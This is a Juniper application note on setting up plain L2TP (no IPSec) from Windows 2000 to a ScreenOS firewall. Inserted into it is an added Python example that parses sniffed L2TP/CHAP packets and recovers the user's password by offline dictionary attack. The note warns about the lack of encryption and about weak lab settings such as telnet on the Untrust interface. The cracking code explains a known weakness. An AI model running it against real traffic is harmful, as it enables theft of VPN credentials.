L2TP Configuration without IPSec



Application Note: L2TP Configuration without IPSec
Version 1.0, January 2008
Juniper Networks, Inc., 1194 North Mathilda Avenue, Sunnyvale, CA 94089 USA, 408 745 2000 or 888 JUNIPER, www.juniper.net

Contents
Introduction
Included Platforms and ScreenOS
Overview
Network Diagram
Configuration Overview
Configuration Steps
Step 1: Define L2TP user
Step 2: Define IP pool
Step 3: Configure default L2TP settings
Step 4: Create L2TP tunnel
Step 5: Define address object for internal resources
Step 6: Create policy
Step 7: Configure Windows 2000 native L2TP connection
Verifying Configuration
Sample Configuration

Copyright 2007, Juniper Networks, Inc.

Introduction

The purpose of this application note is to assist a customer in setting up a remote VPN tunnel using L2TP from a client PC running Microsoft Windows 2000 to a Juniper firewall.

Included Platforms and ScreenOS

This application note demonstrates the firewall setup on ScreenOS 5.4r8. It also applies to the following ScreenOS versions: ScreenOS 5.0, 5.1, 5.2, 5.3, 5.4 and 6.0.

The product list includes the following: NS5000, ISG1000/2000, NS500/200/50/25, SSG550m/550/520m/520/320/350/140, NS5GT, SSG5/20.

Overview

To configure a VPN connection using L2TP to a Juniper firewall, the native Microsoft L2TP VPN connection can be used. This application note provides step-by-step procedures to configure an L2TP VPN connection between Microsoft Windows 2000 and a Juniper firewall.

Note that the tunnel built here is L2TP alone, with no IPSec around it. L2TP provides no encryption or integrity protection, so the PPP frames inside the tunnel, including the CHAP exchange that proves the user's password, cross the Internet in the clear on UDP port 1701, and plain CHAP (as opposed to MS-CHAP) gives the PPP link no MPPE encryption either. Use this configuration only where the transport is already trusted, or to isolate an L2TP problem from an IPSec problem during troubleshooting; for remote access over the Internet, use L2TP over IPSec.

Network Diagram

Refer to Figure 1 below for the network topology used in this configuration example.

Figure 1. Network topology: L2TP client, Internet, Juniper firewall, internal resources (6.0.0.0/24).

Configuration Overview

To set up an L2TP tunnel, the customer needs to:
1. Define an L2TP user login and password
2. Define an IP pool for address assignment
3. Configure L2TP default settings
4. Create the L2TP tunnel
5. Define an address object for internal resources
6. Create a policy to permit L2TP traffic
7. Configure the native L2TP connection on Windows 2000

Configuration Steps

Step 1: Define L2TP user

To define an L2TP user, you need to configure an L2TP user name and password. In this example, we define the L2TP user l2-user1 with password test123. The password is a lab value only; because the CHAP exchange that proves it is not encrypted in this setup, use a long, unique secret in a real deployment.

WebUI: Select Objects > Users > Local, then click New. Enter the following, then click OK.
User Name: l2-user1
Status: Enable (selected)
L2TP User: (selected)
User Password: test123 (enter the password)
Confirm Password: test123 (enter the password)

CLI:
set user l2-user1 type l2tp
set user l2-user1 password test123

Step 2: Define IP pool

An IP pool is used to assign an IP address to the L2TP client. Here, we define an IP pool that assigns IP addresses in the range 6.0.0.100 to 6.0.0.110 to L2TP clients.

WebUI: Select Objects > IP Pools, then click New. Enter the following and click OK.
IP Pool Name: l2-pool
Start IP: 6.0.0.100
End IP: 6.0.0.110

CLI:
set ippool l2-pool 6.0.0.100 6.0.0.110

Step 3: Configure default L2TP settings

The default L2TP settings, including the IP pool assignment, PPP authentication protocol, DNS server setting and WINS server setting, are configured on the L2TP default settings page.

WebUI: Select VPNs > L2TP > Default Settings, then enter the following. Click Apply when finished.
IP Pool Name: l2-pool
PPP Authentication: CHAP
DNS Primary Server IP: 1.1.1.1
DNS Secondary Server IP: 1.1.1.2

CLI:
set l2tp default dns1 1.1.1.1
set l2tp default dns2 1.1.1.2
set l2tp default ippool "l2-pool"
set l2tp default ppp-auth chap

Step 4: Create L2TP tunnel

Create the L2TP tunnel by specifying the outgoing interface and IP pool.

WebUI: Select VPNs > L2TP > Tunnel, then click New. Enter the following and click OK.
Name: l2-tunnel
Outgoing Interface: ethernet0/0
IP Pool Name: l2-pool

CLI:
set l2tp "l2-tunnel" outgoing-interface ethernet0/0
set l2tp "l2-tunnel" remote-setting ippool "l2-pool"

Step 5: Define address object for internal resources

An address object for the internal resources is used in a policy to control the traffic that passes through the firewall from the L2TP client.

WebUI: Select Objects > Addresses > List, select Trust and click New. Enter the following and click OK.
Address Name: lan
IP Address/Netmask: 6.0.0.0/24

CLI:
set address trust lan 6.0.0.0/24

Step 6: Create policy

To allow the L2TP client to send traffic through the tunnel to the internal resources, a policy is needed. Here, we create a policy that permits any traffic from the L2TP client to the internal resources; in production, restrict the service column to what the remote users actually need.

WebUI: Select Policies, choose From: Untrust and To: Trust, then click New. Enter the following and click OK.
Source Address: Address Book Entry (selected), Dial-Up VPN
Destination Address: Address Book Entry, lan
L2TP: l2-tunnel

CLI:
set policy id 1 from "Untrust" to "Trust" "Dial-Up VPN" "lan" "ANY" tunnel l2tp "l2-tunnel"
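The added example below (Python, written for this edit; it is not code from the application note or from Juniper) shows what the firewall-side configuration above gives an observer on the path: L2TP with PPP CHAP and no IPSec. It builds a constructed L2TP data message carrying a CHAP Challenge and the matching Response (RFC 2661 and RFC 1994 encodings), parses them the way a passive sniffer on UDP/1701 could, and then tests password guesses offline against the captured pair. The tunnel and session IDs, the challenge bytes, the peer names and the wordlist are constructed for the example; only the user name l2-user1 and the password test123 are the note's own values.

```python
"""Added example: L2TP without IPSec carries PPP CHAP in the clear.

Builds a constructed L2TPv2 data message wrapping a PPP CHAP Challenge/Response,
parses it as a passive observer would, and recovers the PPP secret offline.
Not part of the Juniper application note; all packets here are constructed.
"""
import hashlib
import struct

CHAP_PROTOCOL = 0xC223            # PPP protocol number for CHAP
CHAP_CHALLENGE, CHAP_RESPONSE = 1, 2


def build_l2tp_data(tunnel_id, session_id, ppp_frame):
    """L2TPv2 data message: T=0, L=1, version 2, then Length, Tunnel ID, Session ID."""
    header = struct.pack("!HHHH", 0x4002, 8 + len(ppp_frame), tunnel_id, session_id)
    return header + ppp_frame


def parse_l2tp(pkt):
    """Return (is_control, tunnel_id, session_id, payload) for an L2TPv2 packet."""
    flags = struct.unpack("!H", pkt[:2])[0]
    if flags & 0x000F != 2:
        raise ValueError("not L2TPv2")
    off = 2
    if flags & 0x4000:            # L bit: 16-bit Length field present
        off += 2
    tunnel_id, session_id = struct.unpack("!HH", pkt[off:off + 4])
    off += 4
    if flags & 0x0800:            # S bit: Ns/Nr present
        off += 4
    if flags & 0x0200:            # O bit: Offset Size plus padding
        off += 2 + struct.unpack("!H", pkt[off:off + 2])[0]
    return bool(flags & 0x8000), tunnel_id, session_id, pkt[off:]


def build_chap(code, ident, value, name):
    """PPP frame (Address/Control 0xFF03, protocol 0xC223) carrying a CHAP packet."""
    body = bytes([len(value)]) + value + name
    chap = struct.pack("!BBH", code, ident, 4 + len(body)) + body
    return b"\xff\x03" + struct.pack("!H", CHAP_PROTOCOL) + chap


def parse_chap(ppp_frame):
    """Return (code, ident, value, name) if the frame is a CHAP Challenge or Response."""
    if ppp_frame[:2] == b"\xff\x03":
        ppp_frame = ppp_frame[2:]
    if struct.unpack("!H", ppp_frame[:2])[0] != CHAP_PROTOCOL:
        return None
    code, ident, length = struct.unpack("!BBH", ppp_frame[2:6])
    if code not in (CHAP_CHALLENGE, CHAP_RESPONSE):
        return None
    vsize = ppp_frame[6]
    return code, ident, ppp_frame[7:7 + vsize], ppp_frame[7 + vsize:2 + length]


def chap_response(ident, secret, challenge):
    """RFC 1994: Response Value = MD5(Identifier || secret || Challenge Value)."""
    return hashlib.md5(bytes([ident]) + secret + challenge).digest()


def recover_secret(captured, wordlist):
    """Offline dictionary test against a sniffed CHAP Challenge/Response pair.

    Returns (peer name, secret) on success, None if the pair is absent or no
    word in the list matches.
    """
    chall = resp = None
    for pkt in captured:
        is_control, _, _, payload = parse_l2tp(pkt)
        if is_control:
            continue
        chap = parse_chap(payload)
        if chap is None:
            continue
        if chap[0] == CHAP_CHALLENGE:
            chall = chap
        else:
            resp = chap
    if chall is None or resp is None:
        return None
    ident, challenge = chall[1], chall[2]
    for guess in wordlist:
        if chap_response(ident, guess, challenge) == resp[2]:
            return resp[3].decode(), guess.decode()
    return None


# Constructed capture: the firewall's challenge and the client's response, as
# they would appear on UDP/1701 with nothing encrypting them.
IDENT = 7
CHALLENGE = bytes(range(16))                   # constructed 16-byte challenge
SECRET = b"test123"                            # the note's example password
CAPTURE = [
    build_l2tp_data(4, 1, build_chap(CHAP_CHALLENGE, IDENT, CHALLENGE, b"SSG140")),
    build_l2tp_data(4, 1, build_chap(CHAP_RESPONSE, IDENT,
                                     chap_response(IDENT, SECRET, CHALLENGE), b"l2-user1")),
]
WORDLIST = [b"password", b"juniper", b"test123", b"netscreen"]   # constructed

if __name__ == "__main__":
    print(recover_secret(CAPTURE, WORDLIST))   # ('l2-user1', 'test123')
```

The only control that takes the challenge/response pair off the wire is wrapping the L2TP session in IPSec. A longer password or MS-CHAP v2 raises the cost of guessing but still leaves the exchange, and every PPP payload after it, readable to anyone between the client and ethernet0/0.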

Step 7: Configure native L2TP connection on Windows 2000

By default, the native L2TP client in Windows 2000 insists on IPSec: a connection of type L2TP is really L2TP over IPSec. To connect to the plain L2TP tunnel configured above, override this default with the ProhibitIPSec registry value. Note that this value is machine-wide: it disables IPSec for every L2TP connection on that PC, not only this one.

1. Log in to Windows 2000 as administrator.
2. Run regedit to open the Windows 2000 registry.
3. Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RasMan\Parameters.
4. If the ProhibitIPSec value exists, go to step 5. If it does not exist, create it: select Edit > New > DWORD Value and name the new value ProhibitIPSec.
5. Set the value data to 1.
6. Save the change and reboot the PC.
7. Select Start > Programs > Accessories > Communications > Network and Dial-up Connections.
8. Double-click Make New Connection and click Next.
9. Select Connect to a private network through the Internet and click Next.
10. Select Do not dial the initial connection and click Next.
11. Enter the IP address of the firewall (172.27.6.135) and click Next.
12. Select For all users and click Next.
13. Click Next again, enter the connection name (L2TP_to_SSG140), then click Finish.
14. Right-click the new connection icon (L2TP_to_SSG140) and select Properties.
15. On the Security tab, select Allow these protocols. Clear all other protocols and check only Challenge Handshake Authentication Protocol (CHAP), then click OK. With only CHAP selected the client will not negotiate MPPE, so the PPP link itself carries no encryption.
16. On the Networking tab, select Layer-2 Tunneling Protocol (L2TP) as the Type of VPN and click OK.

Verifying Configuration

The configuration can be verified by connecting the PC L2TP client to the firewall.

1. From Network and Dial-up Connections, double-click the L2TP connection icon.
2. In the connect window, enter the user name and password, then click Connect.
3. When the connection is established, a connection-complete window appears.
4. Once connected, open a command prompt and run ipconfig to check the IP address assigned; it should fall inside the pool 6.0.0.100 to 6.0.0.110.
5. From the command prompt, ping the internal resources to check connectivity.
6. From the firewall CLI, check the L2TP tunnel status:

SSG140-> get l2tp l2-tunnel active
L2TP Name       Tunnel Id Peer Address    Port Peer Host    Calls State   t_info
--------------- --------- --------------- ---- ------------ ----- ------- --HEX---
l2-tunnel       ( 4/ 4)   172.27.6.66     1701 tac1.tac1.ap 1     estblsh 80008004
  call id(local/peer)=(1/1) assigned ip=6.0.0.100, user="l2-user1", type=incoming, state=establish
  Logged in at: 01/28/2008 16:28:31
l2-tunnel       ( 0/ 0)   0.0.0.0         0                 0     idle    80000001

The output shows the source IP address of the L2TP client (172.27.6.66) and the tunnel state (estblsh). The call line beneath it shows the user name and the IP address assigned to the L2TP connection.
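To turn the manual check in step 6 into something repeatable, the added example below (Python, written for this edit and not part of the application note) parses the `get l2tp <tunnel> active` output into tunnel and call records and checks that every established call received an address from the configured pool. The sample text is the note's own output re-typed as a constructed string; the pool bounds 6.0.0.100 to 6.0.0.110 are the note's. The column regex is an assumption about the layout shown above, so adjust it if your ScreenOS version prints the table differently.

```python
"""Added example: parse ScreenOS `get l2tp <name> active` output and verify
that established L2TP calls hold addresses from the configured IP pool.
Not part of the Juniper application note; SAMPLE_OUTPUT is constructed
from the note's printed output.
"""
import ipaddress
import re

SAMPLE_OUTPUT = """\
L2TP Name       Tunnel Id Peer Address    Port Peer Host    Calls State   t_info
--------------- --------- --------------- ---- ------------ ----- ------- --HEX---
l2-tunnel       ( 4/ 4)   172.27.6.66     1701 tac1.tac1.ap 1     estblsh 80008004
  call id(local/peer)=(1/1) assigned ip=6.0.0.100, user="l2-user1", type=incoming, state=establish
  Logged in at: 01/28/2008 16:28:31
l2-tunnel       ( 0/ 0)   0.0.0.0         0                 0     idle    80000001
"""

# Tunnel rows: name, (local/peer id), peer address, port, optional peer host,
# call count, state, t_info. Assumed layout, taken from the output above.
TUNNEL_RE = re.compile(
    r"^(\S+)\s+\(\s*(\d+)/\s*(\d+)\)\s+(\d+\.\d+\.\d+\.\d+)\s+(\d+)\s+"
    r"(?:(\S+)\s+)?(\d+)\s+(\S+)\s+([0-9A-Fa-f]{8})\s*$"
)
# Indented call rows that follow an established tunnel.
CALL_RE = re.compile(
    r'call id\(local/peer\)=\((\d+)/(\d+)\) assigned ip=(\S+), '
    r'user="([^"]*)", type=(\w+), state=(\w+)'
)


def parse_l2tp_active(text):
    """Return a list of tunnel dicts, each carrying its parsed call rows."""
    tunnels = []
    for line in text.splitlines():
        m = TUNNEL_RE.match(line)
        if m:
            tunnels.append({
                "name": m[1], "local_id": int(m[2]), "peer_id": int(m[3]),
                "peer": m[4], "port": int(m[5]), "peer_host": m[6] or "",
                "calls": int(m[7]), "state": m[8], "t_info": m[9],
                "calls_detail": [],
            })
            continue
        c = CALL_RE.search(line)
        if c and tunnels:
            tunnels[-1]["calls_detail"].append({
                "local_call": int(c[1]), "peer_call": int(c[2]),
                "assigned_ip": c[3], "user": c[4], "type": c[5], "state": c[6],
            })
    return tunnels


def check_pool(tunnels, pool_start, pool_end):
    """Return a list of problem strings; empty means every established call is healthy."""
    lo, hi = ipaddress.ip_address(pool_start), ipaddress.ip_address(pool_end)
    problems = []
    for t in tunnels:
        if t["state"] != "estblsh":
            continue
        if len(t["calls_detail"]) != t["calls"]:
            problems.append(f"{t['name']}: {t['calls']} calls reported, "
                            f"{len(t['calls_detail'])} call rows parsed")
        for c in t["calls_detail"]:
            ip = ipaddress.ip_address(c["assigned_ip"])
            if not lo <= ip <= hi:
                problems.append(f"{t['name']}: user {c['user']} holds {ip}, "
                                f"outside pool {lo}-{hi}")
    return problems


if __name__ == "__main__":
    active = parse_l2tp_active(SAMPLE_OUTPUT)
    for t in active:
        print(t["name"], t["peer"], t["state"], [c["user"] for c in t["calls_detail"]])
    print(check_pool(active, "6.0.0.100", "6.0.0.110") or "pool check passed")
```

Feed it the real CLI output (for example captured over SSH) and run check_pool against the pool from Step 2; a non-empty result means either a call count mismatch or an address that did not come from l2-pool.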

Sample Configuration

The full configuration of the SSG140 used in this example follows. Two things in it are lab conveniences, not recommendations: the Untrust interface ethernet0/0 has telnet, web, SNMP and the other management services enabled, and the console timeout is 0. The policy also carries the log option, which Step 6 omitted; logging the L2TP policy is a good idea. Also note that the admin and user passwords appear only as ScreenOS hashes.

SSG140-> get config
Total Config size 3692:
set clock timezone 0
set vrouter trust-vr sharable
set vrouter "untrust-vr"
exit
set vrouter "trust-vr"
unset auto-route-export
exit
set auth-server "Local" id 0
set auth-server "Local" server-name "Local"
set auth default auth server "Local"
set auth radius accounting port 1646
set admin name "netscreen"
set admin password "nkvum2rwmuzpcrkg5swihdctqkaibn"
set admin auth timeout 10
set admin auth server "Local"
set admin format dos
set zone "Trust" vrouter "trust-vr"
set zone "Untrust" vrouter "trust-vr"
set zone "DMZ" vrouter "trust-vr"
set zone "VLAN" vrouter "trust-vr"
set zone "Untrust-Tun" vrouter "trust-vr"
set zone "Trust" tcp-rst
set zone "Untrust" block
unset zone "Untrust" tcp-rst
set zone "MGT" block
set zone "DMZ" tcp-rst
set zone "VLAN" block
unset zone "VLAN" tcp-rst
set zone "Untrust" screen tear-drop
set zone "Untrust" screen syn-flood
set zone "Untrust" screen ping-death
set zone "Untrust" screen ip-filter-src
set zone "Untrust" screen land
set zone "V1-Untrust" screen tear-drop
set zone "V1-Untrust" screen syn-flood
set zone "V1-Untrust" screen ping-death
set zone "V1-Untrust" screen ip-filter-src
set zone "V1-Untrust" screen land
set interface "ethernet0/0" zone "Untrust"
set interface "ethernet0/1" zone "DMZ"
set interface "ethernet0/2" zone "Trust"
set interface "bri1/0" zone "Untrust"
set interface ethernet0/0 ip 172.27.6.135/24
set interface ethernet0/0 route
unset interface vlan1 ip
set interface ethernet0/2 ip 6.0.0.1/24
set interface ethernet0/2 route
unset interface vlan1 bypass-others-ipsec
unset interface vlan1 bypass-non-ip
set interface ethernet0/0 ip manageable
set interface ethernet0/2 ip manageable
set interface ethernet0/0 manage ping
set interface ethernet0/0 manage ssh
set interface ethernet0/0 manage telnet
set interface ethernet0/0 manage snmp
set interface ethernet0/0 manage ssl
set interface ethernet0/0 manage web
set interface ethernet0/0 manage mtrace
set interface ethernet0/2 manage mtrace
unset flow no-tcp-seq-check
set flow tcp-syn-check
set console timeout 0
set pki authority default scep mode "auto"
set pki x509 default cert-path partial
set address "Trust" "lan" 6.0.0.0 255.255.255.0
set ippool "l2-pool" 6.0.0.100 6.0.0.110

set user "l2-user1" uid 1
set user "l2-user1" type l2tp
set user "l2-user1" password "mlfwmnhhnozn2fsyjdcrjf4ncinckcsfsq=="
unset user "l2-user1" type auth
set user "l2-user1" "enable"
set ike respond-bad-spi 1
unset ike ikeid-enumeration
unset ike dos-protection
unset ipsec access-session enable
set ipsec access-session maximum 5000
set ipsec access-session upper-threshold 0
set ipsec access-session lower-threshold 0
set ipsec access-session dead-p2-sa-timeout 0
unset ipsec access-session log-error
unset ipsec access-session info-exch-connected
unset ipsec access-session use-error-log
set l2tp default dns1 1.1.1.1
set l2tp default dns2 1.1.1.2
set l2tp default ippool "l2-pool"
set l2tp default ppp-auth chap
set l2tp "l2-tunnel" id 1 outgoing-interface ethernet0/0
set l2tp "l2-tunnel" remote-setting ippool "l2-pool"
set url protocol websense
exit
set policy id 1 from "Untrust" to "Trust" "Dial-Up VPN" "lan" "ANY" tunnel l2tp "l2-tunnel" log
set policy id 1
exit
set nsmgmt bulkcli reboot-timeout 60
set nsmgmt bulkcli reboot-wait 0
set ssh version v2
set config lock timeout 5
set snmp port listen 161
set snmp port trap 162
set vrouter "untrust-vr"
exit
set vrouter "trust-vr"
unset add-default-route
set route 0.0.0.0/0 gateway 172.27.6.1
set route 172.27.0.0/16 gateway 172.27.6.1
exit
set vrouter "untrust-vr"
exit
set vrouter "trust-vr"
exit
SSG140->

Copyright 2007, Juniper Networks, Inc. All rights reserved. Juniper Networks and the Juniper Networks logo are registered trademarks of Juniper Networks, Inc. in the United States and other countries. All other trademarks, service marks, registered trademarks, or registered service marks in this document are the property of Juniper Networks or their respective owners. All specifications are subject to change without notice. Juniper Networks assumes no responsibility for any inaccuracies in this document or for any obligation to update information in this document. Juniper Networks reserves the right to change, modify, transfer, or otherwise revise this publication without notice.